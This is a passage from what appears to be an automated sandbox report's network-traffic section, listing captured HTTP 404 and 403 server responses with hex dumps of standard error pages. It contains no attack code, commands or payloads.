lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 09 Sep 2024 02:52:10 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 09 Sep 2024 02:52:13 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 09 Sep 2024 02:52:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-09T02:52:20.7881459Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 09 Sep 2024 02:52:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-09T02:52:23.4310316Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:52:46 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 09 Sep 2024 02:53:32 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 09 Sep 2024 02:53:34 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 09 Sep 2024 02:53:39 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 09 Sep 2024 02:54:16 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 09 Sep 2024 02:54:18 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
